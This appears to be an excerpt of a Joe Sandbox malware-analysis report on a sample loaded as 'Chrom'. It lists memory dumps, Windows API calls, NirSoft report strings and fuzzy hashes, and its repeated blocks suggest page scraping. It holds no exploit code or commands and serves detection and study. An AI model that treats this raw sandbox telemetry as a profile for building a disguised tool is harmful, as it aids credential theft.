• Associated: 00000004.00000002.1693817773.000000000045E000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000004.00000002.1693845131.0000000000474000.00000002.00000001.01000000.0000000C.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_400000_Chrom.jbxd
Yara matches
Similarity
• API ID: PrivateProfilewcscpy$AttributesFileString
• String ID: TranslatorName$TranslatorURL$XE$charset$general$hE$rtl$xE
• API String ID: 3176057301-1663435254
• Opcode ID: ce03a71f4104ba65c7634943c1c0a2916f24712798544291b36441c7694ed038
• Instruction ID: 3d8b461fbaaec7ca5a0689e4e93172b3bcab4f1f7887f11f1c83d51a75cfd1f7
• Opcode Fuzzy Hash: ce03a71f4104ba65c7634943c1c0a2916f24712798544291b36441c7694ed038
• Instruction Fuzzy Hash: 31F0FC21FC132175E2253A635C07F2E35148BD3B57F5648BBBC147E1D3C66C5A48829E
APIs
• GetClientRect.USER32(?,?), ref: 00410D27
• GetWindowRect.USER32(?,?), ref: 00410D3D
• GetWindowRect.USER32(?,?), ref: 00410D53
• GetDlgItem.USER32(00000000,0000040D), ref: 00410D8D
• GetWindowRect.USER32(00000000), ref: 00410D94
• MapWindowPoints.USER32(00000000,00000000,?,00000002), ref: 00410DA4
• BeginDeferWindowPos.USER32(00000004), ref: 00410DC8
• DeferWindowPos.USER32(?,?,00000000,00000000,00000000,?,?,00000004), ref: 00410DEB
• DeferWindowPos.USER32(?,?,00000000,00000000,?,?,?,00000006), ref: 00410E0A
• DeferWindowPos.USER32(?,?,00000000,00000000,000000DC,?,?,00000004), ref: 00410E35
• DeferWindowPos.USER32(?,00000000,00000000,00000000,?,?,000000DC,00000004), ref: 00410E4D
• EndDeferWindowPos.USER32(?), ref: 00410E52
Memory Dump Source
• Source File: 00000004.00000002.1693772779.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000004.00000002.1693760044.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 00000004.00000002.1693803409.000000000044F000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 00000004.00000002.1693817773.000000000045A000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000004.00000002.1693817773.000000000045E000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000004.00000002.1693845131.0000000000474000.00000002.00000001.01000000.0000000C.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_400000_Chrom.jbxd
Yara matches
Similarity
• API ID: Window$Defer$Rect$BeginClientItemPoints
• String ID:
• API String ID: 552707033-0
• Opcode ID: 9f9a1085919ae9ac6807100c514c4c2990173c35f6b033fad767d96a1109aff9
• Instruction ID: f4b3975cf6f7d3be18b30986ddc530eb89c4367e0f7efeac37d180ea3f2c0f2c
• Opcode Fuzzy Hash: 9f9a1085919ae9ac6807100c514c4c2990173c35f6b033fad767d96a1109aff9
• Instruction Fuzzy Hash: AC41C275900209BFEB11DFA8DD89FEEBBBAFB48300F104565E615A21A0C772AA54DB14
APIs
• CreateFileW.KERNEL32(?,80000000,00000003,00000000,00000003,00000000,00000000,?,?,?,0040C703,?,?,*.*,0040C76D,00000000), ref: 0040C552
  • Part of subcall function 0040A8EC: SetFilePointer.KERNEL32(0040C76D,?,00000000,00000000,?,0040C573,00000000,00000000,?,00000020,?,0040C703,?,?,*.*,0040C76D), ref: 0040A8F9
• GetFileSize.KERNEL32(00000000,00000000), ref: 0040C582
  • Part of subcall function 0040C4A1: _memicmp.MSVCRT ref: 0040C4BB
  • Part of subcall function 0040C4A1: memcpy.MSVCRT(?,?,00000004,00000000,?,?,?,?,?,?,?,?,*.*,0040C76D,00000000), ref: 0040C4D2
• memcpy.MSVCRT(00000000,?,00000004,00000000,?,?,?,?), ref: 0040C5C9
• strchr.MSVCRT ref: 0040C5EE
• strchr.MSVCRT ref: 0040C5FF
• _strlwr.MSVCRT ref: 0040C60D
• memset.MSVCRT ref: 0040C628
• CloseHandle.KERNEL32(00000000), ref: 0040C675
Strings
Memory Dump Source
• Source File: 00000004.00000002.1693772779.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000004.00000002.1693760044.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 00000004.00000002.1693803409.000000000044F000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 00000004.00000002.1693817773.000000000045A000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000004.00000002.1693817773.000000000045E000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000004.00000002.1693845131.0000000000474000.00000002.00000001.01000000.0000000C.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_400000_Chrom.jbxd
Yara matches
Similarity
• API ID: File$memcpystrchr$CloseCreateHandlePointerSize_memicmp_strlwrmemset
• String ID: 4$h
• API String ID: 4066021378-1856150674
• Opcode ID: da7a13692060ae409e5302e4995310e5dd5bbfb7a5391393f0fdcb30f537ecd3
• Instruction ID: 65cccf327fa0b5529330076339007647872360192ef6f3cf49ce6089d60f06ae
• Opcode Fuzzy Hash: da7a13692060ae409e5302e4995310e5dd5bbfb7a5391393f0fdcb30f537ecd3
• Instruction Fuzzy Hash: 3B3182B1900218FEEB20EB64CC85EEE77ACEF05318F10457AF608E6181D7399F548B69
APIs
Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000004.00000002.1693772779.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 00000004.00000002.1693760044.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693803409.000000000044F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693817773.000000000045A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693817773.000000000045E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693845131.0000000000474000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_4_2_400000_Chrom.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: memset$_snwprintf
                                                                                                                                                        • String ID: %%0.%df
                                                                                                                                                        • API String ID: 3473751417-763548558
                                                                                                                                                        • Opcode ID: c99c8e2211586e52f8e911d5eb7fbf623d9b3fc3e27082e659afd7ab3044fb1d
                                                                                                                                                        • Instruction ID: 27f99667104659e00ebd78455ae99a1af8c3fb89703bd44fec75f468f68576de
                                                                                                                                                        • Opcode Fuzzy Hash: c99c8e2211586e52f8e911d5eb7fbf623d9b3fc3e27082e659afd7ab3044fb1d
                                                                                                                                                        • Instruction Fuzzy Hash: 2231A471840229BADB20EF55CC85FEB777CFF49314F0104EAB50DA2102E7349A54CB69
                                                                                                                                                        APIs
                                                                                                                                                        • SetTimer.USER32(?,00000041,00000064,00000000), ref: 00407903
                                                                                                                                                        • KillTimer.USER32(?,00000041), ref: 00407913
                                                                                                                                                        • KillTimer.USER32(?,00000041), ref: 00407924
                                                                                                                                                        • GetTickCount.KERNEL32 ref: 00407947
                                                                                                                                                        • GetParent.USER32(?), ref: 00407972
                                                                                                                                                        • SendMessageW.USER32(00000000), ref: 00407979
                                                                                                                                                        • BeginDeferWindowPos.USER32(00000004), ref: 00407987
                                                                                                                                                        • EndDeferWindowPos.USER32(00000000), ref: 004079D7
                                                                                                                                                        • InvalidateRect.USER32(?,?,00000001), ref: 004079E3
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000004.00000002.1693772779.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 00000004.00000002.1693760044.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693803409.000000000044F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693817773.000000000045A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693817773.000000000045E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693845131.0000000000474000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_4_2_400000_Chrom.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: Timer$DeferKillWindow$BeginCountInvalidateMessageParentRectSendTick
                                                                                                                                                        • String ID: A
                                                                                                                                                        • API String ID: 2892645895-3554254475
                                                                                                                                                        • Opcode ID: af84783409e1975db288b0c72e71a8e687db4ca826836481a8f26c8b0f9bbfa9
                                                                                                                                                        • Instruction ID: af3d0bace5b62026118a6a1531e93ae50cbe973fa598ddd1ec3a4275e27b1afc
                                                                                                                                                        • Opcode Fuzzy Hash: af84783409e1975db288b0c72e71a8e687db4ca826836481a8f26c8b0f9bbfa9
                                                                                                                                                        • Instruction Fuzzy Hash: F431C2B9640305BBEB201F61CC86FAB7B6ABB44711F00443AF709B91E0C7F9A855CB59
                                                                                                                                                        APIs
                                                                                                                                                        • LoadMenuW.USER32(?,?), ref: 0040DE2D
                                                                                                                                                          • Part of subcall function 0040DC55: GetMenuItemCount.USER32(?), ref: 0040DC6B
                                                                                                                                                          • Part of subcall function 0040DC55: memset.MSVCRT ref: 0040DC8A
                                                                                                                                                          • Part of subcall function 0040DC55: GetMenuItemInfoW.USER32 ref: 0040DCC6
                                                                                                                                                          • Part of subcall function 0040DC55: wcschr.MSVCRT ref: 0040DCDE
                                                                                                                                                        • DestroyMenu.USER32(00000000), ref: 0040DE4B
                                                                                                                                                        • CreateDialogParamW.USER32(?,?,00000000,0040DE00,00000000), ref: 0040DEA0
                                                                                                                                                        • GetDesktopWindow.USER32 ref: 0040DEAB
                                                                                                                                                        • CreateDialogParamW.USER32(?,?,00000000), ref: 0040DEB8
                                                                                                                                                        • memset.MSVCRT ref: 0040DED1
                                                                                                                                                        • GetWindowTextW.USER32(00000005,?,00001000), ref: 0040DEE8
                                                                                                                                                        • EnumChildWindows.USER32(00000005,Function_0000DD46,00000000), ref: 0040DF15
                                                                                                                                                        • DestroyWindow.USER32(00000005), ref: 0040DF1E
                                                                                                                                                          • Part of subcall function 0040DA84: _snwprintf.MSVCRT ref: 0040DAA9
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000004.00000002.1693772779.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 00000004.00000002.1693760044.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693803409.000000000044F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693817773.000000000045A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693817773.000000000045E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693845131.0000000000474000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_4_2_400000_Chrom.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: Menu$Window$CreateDestroyDialogItemParammemset$ChildCountDesktopEnumInfoLoadTextWindows_snwprintfwcschr
                                                                                                                                                        • String ID: caption
                                                                                                                                                        • API String ID: 973020956-4135340389
                                                                                                                                                        • Opcode ID: de0643627d12cd9ffe249f933e94cd636f301555e7367070b26c87a68ee5e60d
                                                                                                                                                        • Instruction ID: fb89002f7bebac49d56e068043a0f8d6468f1f005a4246ac5316588196cd2f0c
                                                                                                                                                        • Opcode Fuzzy Hash: de0643627d12cd9ffe249f933e94cd636f301555e7367070b26c87a68ee5e60d
                                                                                                                                                        • Instruction Fuzzy Hash: 3E317072900208BFEF11AF90DC85AAF3B69FB15364F10843AF905A91A1D7798998CF59
                                                                                                                                                        APIs
                                                                                                                                                        Strings
                                                                                                                                                        • <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">, xrefs: 004105B7
                                                                                                                                                        • <meta http-equiv='content-type' content='text/html;charset=%s'>, xrefs: 00410624
                                                                                                                                                        • <table dir="rtl"><tr><td>, xrefs: 00410647
                                                                                                                                                        • <br><h4>%s <a href="http://www.nirsoft.net/" target="newwin">%s</a></h4><p>, xrefs: 00410683
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000004.00000002.1693772779.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 00000004.00000002.1693760044.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693803409.000000000044F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693817773.000000000045A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693817773.000000000045E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693845131.0000000000474000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_4_2_400000_Chrom.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: memset$_snwprintf$wcscpy
                                                                                                                                                        • String ID: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">$<br><h4>%s <a href="http://www.nirsoft.net/" target="newwin">%s</a></h4><p>$<meta http-equiv='content-type' content='text/html;charset=%s'>$<table dir="rtl"><tr><td>
                                                                                                                                                        • API String ID: 1283228442-2366825230
                                                                                                                                                        • Opcode ID: 86694fa9596e8e718e964b02816faf9a37d1d78763b9eb9bb7709ff927f38285
                                                                                                                                                        • Instruction ID: 23ba5de25e919ab4fdab3582845b47b673a12a4a92696f01ca941476ed93b1dd
                                                                                                                                                        • Opcode Fuzzy Hash: 86694fa9596e8e718e964b02816faf9a37d1d78763b9eb9bb7709ff927f38285
                                                                                                                                                        • Instruction Fuzzy Hash: 1D21B8B5A001186BDB21BB95CC41EDA37BCEF58745F0140BEF508D3151DA389AC88F69
                                                                                                                                                        APIs
                                                                                                                                                        • wcschr.MSVCRT ref: 004153BF
                                                                                                                                                        • wcscpy.MSVCRT ref: 004153CF
                                                                                                                                                          • Part of subcall function 00409DB6: wcslen.MSVCRT ref: 00409DC5
                                                                                                                                                          • Part of subcall function 00409DB6: wcslen.MSVCRT ref: 00409DCF
                                                                                                                                                          • Part of subcall function 00409DB6: _memicmp.MSVCRT ref: 00409DEA
                                                                                                                                                        • wcscpy.MSVCRT ref: 0041541E
                                                                                                                                                        • wcscat.MSVCRT ref: 00415429
                                                                                                                                                        • memset.MSVCRT ref: 00415405
                                                                                                                                                          • Part of subcall function 0040A394: GetWindowsDirectoryW.KERNEL32(0045EC58,00000104,?,0041545E,?,?,00000000,00000208,?), ref: 0040A3AA
                                                                                                                                                          • Part of subcall function 0040A394: wcscpy.MSVCRT ref: 0040A3BA
                                                                                                                                                        • memset.MSVCRT ref: 0041544D
                                                                                                                                                        • memcpy.MSVCRT(?,?,00000004,?,?,00000000,00000208,?), ref: 00415468
                                                                                                                                                        • wcscat.MSVCRT ref: 00415474
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000004.00000002.1693772779.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 00000004.00000002.1693760044.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693803409.000000000044F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693817773.000000000045A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693817773.000000000045E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693845131.0000000000474000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_4_2_400000_Chrom.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: wcscpy$memsetwcscatwcslen$DirectoryWindows_memicmpmemcpywcschr
                                                                                                                                                        • String ID: \systemroot
                                                                                                                                                        • API String ID: 4173585201-1821301763
                                                                                                                                                        • Opcode ID: fa167bbd5e4528be15fe591abc0a22bdfd687e9aef1f213e27ce40de2961ead0
                                                                                                                                                        • Instruction ID: f104943179f08cd93f8001f39408b1af5f6ad57b201dd995218135a96354df9e
                                                                                                                                                        • Opcode Fuzzy Hash: fa167bbd5e4528be15fe591abc0a22bdfd687e9aef1f213e27ce40de2961ead0
                                                                                                                                                        • Instruction Fuzzy Hash: 572129B2506304A9F621F3A24C46EEB63EC9F46714F20455FF524D2082EB7C99C44B6F
APIs
  • Part of subcall function 004192F2: GetVersionExW.KERNEL32(?), ref: 00419315
• GetFullPathNameW.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00000000), ref: 0041A603
• malloc.MSVCRT ref: 0041A60E
• free.MSVCRT ref: 0041A61E
• GetFullPathNameW.KERNEL32(00000000,-00000003,00000000,00000000), ref: 0041A632
• free.MSVCRT ref: 0041A637
• GetFullPathNameA.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00000000), ref: 0041A64D
• malloc.MSVCRT ref: 0041A655
• GetFullPathNameA.KERNEL32(00000000,-00000003,00000000,00000000), ref: 0041A668
• free.MSVCRT ref: 0041A66D
• free.MSVCRT ref: 0041A681
• free.MSVCRT ref: 0041A6A0
Memory Dump Source
• Source File: 00000004.00000002.1693772779.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000004.00000002.1693760044.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 00000004.00000002.1693803409.000000000044F000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 00000004.00000002.1693817773.000000000045A000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000004.00000002.1693817773.000000000045E000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000004.00000002.1693845131.0000000000474000.00000002.00000001.01000000.0000000C.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_400000_Chrom.jbxd
Yara matches
Similarity
• API ID: free$FullNamePath$malloc$Version
• String ID:
• API String ID: 3356672799-0
• Opcode ID: 81b576499755cb31c8c6be5d07b3d32296e332f63dcbe60c266eca3a6750f240
• Instruction ID: f6f3b6a306e4f0e49f71bf4976b7ceda75d2138abfea52430b05dfcd18a6bddb
• Opcode Fuzzy Hash: 81b576499755cb31c8c6be5d07b3d32296e332f63dcbe60c266eca3a6750f240
• Instruction Fuzzy Hash: 2121987190211CBFEF10BBA5DC46CDF7FA9DF41368B25007BF404A2161DB395E90966A
APIs
Strings
Memory Dump Source
• Source File: 00000004.00000002.1693772779.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000004.00000002.1693760044.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 00000004.00000002.1693803409.000000000044F000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 00000004.00000002.1693817773.000000000045A000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000004.00000002.1693817773.000000000045E000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000004.00000002.1693845131.0000000000474000.00000002.00000001.01000000.0000000C.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_400000_Chrom.jbxd
Yara matches
Similarity
• API ID: wcscpy
• String ID: AppData$Common Desktop$Common Programs$Common Start Menu$Common Startup$Desktop$Favorites$Programs$Start Menu$Startup
• API String ID: 1284135714-318151290
• Opcode ID: dd6fa36c037bc6e4ff8f29b7a4256e51cef250e0a1f7438453280f81013bf7c0
• Instruction ID: d324c76f68bf74469ccfd3712f78ba9dcc04a4285760018fac4a8f65c25a8c98
• Opcode Fuzzy Hash: dd6fa36c037bc6e4ff8f29b7a4256e51cef250e0a1f7438453280f81013bf7c0
• Instruction Fuzzy Hash: 95F036316ECF3562143415282916EFA401891317F73BB43176C0EE22E6C9CCF9CA905F
APIs
Strings
Memory Dump Source
• Source File: 00000004.00000002.1693772779.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000004.00000002.1693760044.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 00000004.00000002.1693803409.000000000044F000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 00000004.00000002.1693817773.000000000045A000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000004.00000002.1693817773.000000000045E000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000004.00000002.1693845131.0000000000474000.00000002.00000001.01000000.0000000C.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_400000_Chrom.jbxd
Yara matches
Similarity
• API ID: Menu$Itemmemset$CountInfoModifywcscatwcschr
• String ID: 0$6
• API String ID: 4066108131-3849865405
• Opcode ID: 2396ed8fc361ba4a45bb880d20a87c435b430e1ae6be7f4a73d8f914fd610035
• Instruction ID: f65e57152afae8b0dd47d5e8eb23764001e0fb6d1e5383f22b1dcfc0afcde8a7
• Opcode Fuzzy Hash: 2396ed8fc361ba4a45bb880d20a87c435b430e1ae6be7f4a73d8f914fd610035
• Instruction Fuzzy Hash: BE319072808300AFDB20AF91D84499FB7E8EF84354F04893FFA98A2191D375D948CF5A
APIs
• memset.MSVCRT ref: 004094B7
  • Part of subcall function 0040ACA5: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,000003FF,000000FF,00000000,000003FF,00000000,00000000,0040121D,?,?,?,?,?,?,?), ref: 0040ACBE
• memset.MSVCRT ref: 0040952E
• memset.MSVCRT ref: 00409544
Memory Dump Source
• Source File: 00000004.00000002.1693772779.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000004.00000002.1693760044.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 00000004.00000002.1693803409.000000000044F000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 00000004.00000002.1693817773.000000000045A000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000004.00000002.1693817773.000000000045E000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000004.00000002.1693845131.0000000000474000.00000002.00000001.01000000.0000000C.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_400000_Chrom.jbxd
Yara matches
Similarity
• API ID: memset$ByteCharMultiWide
• String ID:
• API String ID: 290601579-0
• Opcode ID: 03c39fb9b8d424ef954cafc48962265f98f5dfa66375acb9161703e9137a6be8
• Instruction ID: d523f13bca41d4f63d03b58f3e107dc7881316ec19a855ef67c9f0f82ee91530
• Opcode Fuzzy Hash: 03c39fb9b8d424ef954cafc48962265f98f5dfa66375acb9161703e9137a6be8
• Instruction Fuzzy Hash: FF9183B2D042199FDF14EFA59C82AEDB7B5AF44314F1404AFF608B6282DB395D44CB19
APIs
• GetSystemMetrics.USER32(00000011), ref: 0040A51A
• GetSystemMetrics.USER32(00000010), ref: 0040A520
• GetDC.USER32(00000000), ref: 0040A52D
• GetDeviceCaps.GDI32(00000000,00000008), ref: 0040A53E
• GetDeviceCaps.GDI32(00000000,0000000A), ref: 0040A545
• ReleaseDC.USER32(00000000,00000000), ref: 0040A54C
• GetWindowRect.USER32(?,?), ref: 0040A55F
• GetParent.USER32(?), ref: 0040A564
• GetWindowRect.USER32(00000000,00000000), ref: 0040A581
• MoveWindow.USER32(?,?,?,?,?,00000001), ref: 0040A5E0
Memory Dump Source
• Source File: 00000004.00000002.1693772779.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000004.00000002.1693760044.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 00000004.00000002.1693803409.000000000044F000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 00000004.00000002.1693817773.000000000045A000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000004.00000002.1693817773.000000000045E000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000004.00000002.1693845131.0000000000474000.00000002.00000001.01000000.0000000C.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_400000_Chrom.jbxd
Yara matches
Similarity
• API ID: Window$CapsDeviceMetricsRectSystem$MoveParentRelease
• String ID:
• API String ID: 2163313125-0
• Opcode ID: ead36faa3fb79a80cd8612a374053d91ddf5485b81bdcaaea8d99c602293a2a0
• Instruction ID: f502094e92981caa4834973bf97846e608375c731a187de988a633f4dd51eeda
• Opcode Fuzzy Hash: ead36faa3fb79a80cd8612a374053d91ddf5485b81bdcaaea8d99c602293a2a0
• Instruction Fuzzy Hash: C2317076A00209AFDB14CFB8CC85AEEBBB9FB48355F150179E901F3290DA71AD458B60
APIs
• memset.MSVCRT ref: 00403A68
• _snwprintf.MSVCRT ref: 00403AFB
• _snwprintf.MSVCRT ref: 00403B26
• _snwprintf.MSVCRT ref: 00403B51
• wcschr.MSVCRT ref: 00403972
  • Part of subcall function 0040B0B2: wcslen.MSVCRT ref: 0040B0CE
  • Part of subcall function 0040B0B2: memcpy.MSVCRT(00000000,?,00000000,00000000,?,0000002C,?,0040F32D), ref: 0040B0F1
  • Part of subcall function 0040AEF6: wcslen.MSVCRT ref: 0040AF08
  • Part of subcall function 0040AEF6: free.MSVCRT ref: 0040AF2E
  • Part of subcall function 0040AEF6: free.MSVCRT ref: 0040AF51
  • Part of subcall function 0040AEF6: memcpy.MSVCRT(?,?,000000FF,00000001,?,00000000,?,?,0040B39C,?,000000FF), ref: 0040AF75
Strings
Memory Dump Source
• Source File: 00000004.00000002.1693772779.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000004.00000002.1693760044.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 00000004.00000002.1693803409.000000000044F000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 00000004.00000002.1693817773.000000000045A000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000004.00000002.1693817773.000000000045E000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000004.00000002.1693845131.0000000000474000.00000002.00000001.01000000.0000000C.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_400000_Chrom.jbxd
Yara matches
Similarity
• API ID: _snwprintf$freememcpywcslen$memsetwcschr
• String ID: "$"$%I64d
• API String ID: 22347003-3439576549
• Opcode ID: f2385fb97e0c4f99ddef286ed600442e38c7ba1bb554b94d3fe1eb697817be01
• Instruction ID: 0bf4e81249543337a88649caf9663a23bfc85987250b829cb93633c0d649e96a
• Opcode Fuzzy Hash: f2385fb97e0c4f99ddef286ed600442e38c7ba1bb554b94d3fe1eb697817be01
• Instruction Fuzzy Hash: 94D1A172508345AFD710EF55C88199BBBE8FF84308F00493FF591A3191D779EA498B9A
                                                                                                                                                        APIs
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000004.00000002.1693772779.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 00000004.00000002.1693760044.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693803409.000000000044F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693817773.000000000045A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693817773.000000000045E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693845131.0000000000474000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_4_2_400000_Chrom.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: free$wcslen
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 3592753638-3916222277
                                                                                                                                                        • Opcode ID: 817fdffa1778754f202b473bcf56fa80498cf4c5f79b1c0829f3a8a504be4d4d
                                                                                                                                                        • Instruction ID: c97d06dd0f2be15faafac33d75df6d0848abc1c3546c13c08877cf69662a8948
                                                                                                                                                        • Opcode Fuzzy Hash: 817fdffa1778754f202b473bcf56fa80498cf4c5f79b1c0829f3a8a504be4d4d
                                                                                                                                                        • Instruction Fuzzy Hash: E9616D30C0521ADADF18AF95E4814EEBB79FF08307F60857FE411B6295DB394A81CB59
                                                                                                                                                        APIs
